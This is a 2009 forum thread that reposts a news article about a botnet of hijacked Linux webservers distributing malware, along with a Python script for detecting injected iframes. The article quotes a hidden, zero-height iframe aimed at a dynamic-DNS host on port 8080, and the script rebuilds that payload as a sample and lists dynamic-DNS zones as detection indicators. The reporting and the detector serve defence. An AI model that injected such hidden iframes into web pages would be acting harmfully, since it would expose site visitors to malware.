This topic is in the Board Business & Questions discussion forum.


Where do you pick up those nasty bugs?




Topic started on 13-9-2009 @ 11:34 AM by Stormdancer777


Linux webserver botnet pushes malware


Attack of the open source zombies

By Dan Goodin in San Francisco

Posted in Security, 12th September 2009 00:32 GMT


A security researcher has discovered a cluster of infected Linux servers that have been corralled into a special ops botnet of sorts and used to distribute malware to unwitting people browsing the web.

Each of the infected machines examined so far is a dedicated or virtual dedicated server running a legitimate website, Denis Sinegubko, an independent researcher based in Magnitogorsk, Russia, told The Register. But in addition to running an Apache webserver to dish up benign content, they've also been hacked to run a second webserver known as nginx, which serves malware.

"What we see here is a long awaited botnet of zombie web servers! A group of interconnected infected web servers with [a] common control center involved in malware distribution," Sinegubko wrote here. "To make things more complex, this botnet of web servers is connected with the botnet of infected home computer(s)."

The finding highlights the continuing evolution of bot herders as they look for new ways to issue commands to the hundreds of thousands of infected zombies under their control. It came the same day anti-virus provider Symantec reported Google Groups was being used as a master control channel for a recently discovered trojan. Four weeks ago, a researcher from Arbor Networks made a similar discovery when he found several Twitter profiles being used to run a botnet.

The infected machines observed by Sinegubko serve legitimate traffic on port 80, the standard TCP port used by websites. Behind the scenes, the rogue server sends malicious traffic over port 8080. The malicious payloads are then delivered with the help of dynamic DNS hosting providers, which offer free domain names that are mapped to the IP address of the zombie webserver.

The links look something like this:

<iframe src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden">
They are injected into legitimate websites, so that they are surreptitiously served when users browse the infected page.

"It's better to have both zombie clients and servers at the same time," Sinegubko wrote in an instant message. "The heterogeneous system provides much more possibilities [and] makes the whole system more flexible."

It's unclear exactly how the servers have become infected. Sinegubko speculates they belong to careless administrators who allowed their root passwords to be sniffed. Indeed, the part of the multi-staged attack that plants malicious iframes into legitimate webpages uses FTP passwords that have been stolen using password sniffers. It's likely the zombie servers were compromised in the same fashion, he explained.

With about 100 nodes, the network is relatively small, making it unclear exactly what the attackers' intentions are. All of the boxes examined so far have run the Apache webserver on various distributions of Linux, he said.

"Probably it's some sort of proof-of-concept thing for hackers," he wrote. "Or maybe they have many more other compromised servers waiting for their turn."

So far, Sinegubko said, DynDNS.com and No-IP.com, the two dynamic hosting providers used by the attackers, have been commendably responsive in shutting down domains used in the attack. But he went on to say he is detecting about two new IP addresses every hour, an indication that this may not be the last we've heard of the phenomenon.

In light of the topic on picking up viruses from this forum, I wondered if this might help.

www.theregister.co.uk...



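The article's indicators are concrete enough to check for on your own site: a zero-height iframe, hidden by CSS, whose src points at a dynamic-DNS hostname on port 8080. The script below is an added example, not code from the article, from Sinegubko, or from anyone in this thread. It parses saved HTML with the standard library and flags iframes that combine two or more of those traits. The list of dynamic-DNS zones beyond homeunix.org (the zone in the quoted link) and the sample page it runs over are assumptions constructed for illustration.

```python
"""Find hidden iframes pointing at dynamic-DNS hosts on port 8080, the
injection pattern described in the article. Feed it saved copies of your
own pages (e.g. fetched with curl) to spot an injected frame."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Dynamic-DNS zones. homeunix.org is the zone in the article's sample link;
# the other entries are assumed additions for illustration, extend as needed.
DYNDNS_SUFFIXES = ("homeunix.org", "dyndns.org", "no-ip.org", "no-ip.biz", "hopto.org")
SUSPECT_PORTS = {8080}          # the article's zombie servers listened here
MIN_INDICATORS = 2              # flag only when at least two signs coincide


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

    handle_startendtag = handle_starttag   # also catch the <iframe ... /> form


def _dimension(value):
    """Parse '0', '0px' -> int pixels; anything else (e.g. '100%') -> None."""
    m = re.match(r"\s*(\d+)\s*(px)?\s*$", value)
    return int(m.group(1)) if m else None


def iframe_indicators(attrs, page_host):
    """Return the reasons one iframe resembles the injected frame."""
    reasons = []
    style = attrs.get("style", "").replace(" ", "").lower()
    h, w = _dimension(attrs.get("height", "")), _dimension(attrs.get("width", ""))
    if (h is not None and h <= 1) or (w is not None and w <= 1):
        reasons.append("zero-size frame")
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden by CSS")

    try:
        parts = urlsplit(attrs.get("src", ""))
        host, port = (parts.hostname or "").lower(), parts.port
    except ValueError:          # malformed port such as ":80x"
        host, port = "", None
    if port in SUSPECT_PORTS:
        reasons.append(f"non-standard port {port}")
    if host and any(host == s or host.endswith("." + s) for s in DYNDNS_SUFFIXES):
        reasons.append(f"dynamic-DNS host {host}")
    if host and page_host and host != page_host.lower():
        reasons.append("third-party host")
    return reasons


def find_injected_iframes(html, page_host):
    """Return [(src, reasons)] for iframes with >= MIN_INDICATORS suspicious traits."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        reasons = iframe_indicators(attrs, page_host)
        if len(reasons) >= MIN_INDICATORS:
            hits.append((attrs.get("src", ""), reasons))
    return hits


# Constructed sample: a page on www.example.com with one legitimate embed and
# one injected frame rebuilt from the link quoted in the article.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/VIDEO_ID" width="560" height="315"></iframe>
<iframe src="http://a86x.homeunix.org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_injected_iframes(SAMPLE_HTML, "www.example.com"):
        print(src, "->", ", ".join(reasons))
```

The legitimate embed scores only "third-party host" and stays below the threshold, while the injected frame trips every indicator. Requiring two coinciding signs keeps a single off-site iframe from paging anyone; a frame that is merely hidden but served from your own host is worth a look, not an alert.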


reply posted on 13-9-2009 @ 12:11 PM by rogerstigers


Clever. Interesting that the iframe trick was highlighted. I mentioned that very trick in The Porno Deceit that could jail millions....

I also find it interesting to see that the botnets are evolving. I designed one about 6 years ago as a developer exercise that was similar in nature. Now they can be upgraded, modified, and even shut down from external ports on any machine. Very clever indeed.





reply posted on 13-9-2009 @ 01:08 PM by Stormdancer777


Originally posted by rogerstigers
Clever. Interesting that the iframe trick was highlighted. I mentioned that very trick in The Porno Deceit that could jail millions....

I also find it interesting to see that the botnets are evolving. I designed one about 6 years ago as a developer exercise that was similar in nature. Now they can be upgraded, modified, and even shut down from external ports on any machine. Very clever indeed.


Hi, TY for the reply, I really know very little about all this, but thought others might be interested.





reply posted on 13-9-2009 @ 05:25 PM by theyreadmymind


Typically what people who make these botnets do is they watch security sites that post known security flaws in the operating system. In this case, Linux. Then someone writes a script that takes advantage of that hole and it just scans a whole range of IP addresses until it finds servers whose administrators haven't gotten around to patching their systems yet. They can find a whole lot of servers this way. Then they have root access to the whole server, meaning that basically they own it, and they can install whatever software they please on it.

In many or most cases, the person who creates the botnet is not even the person who wrote the hacking script. A lot of times one hacker will write the script and then just release it on the net for anyone who wants to use it.

[edit on 13-9-2009 by theyreadmymind]


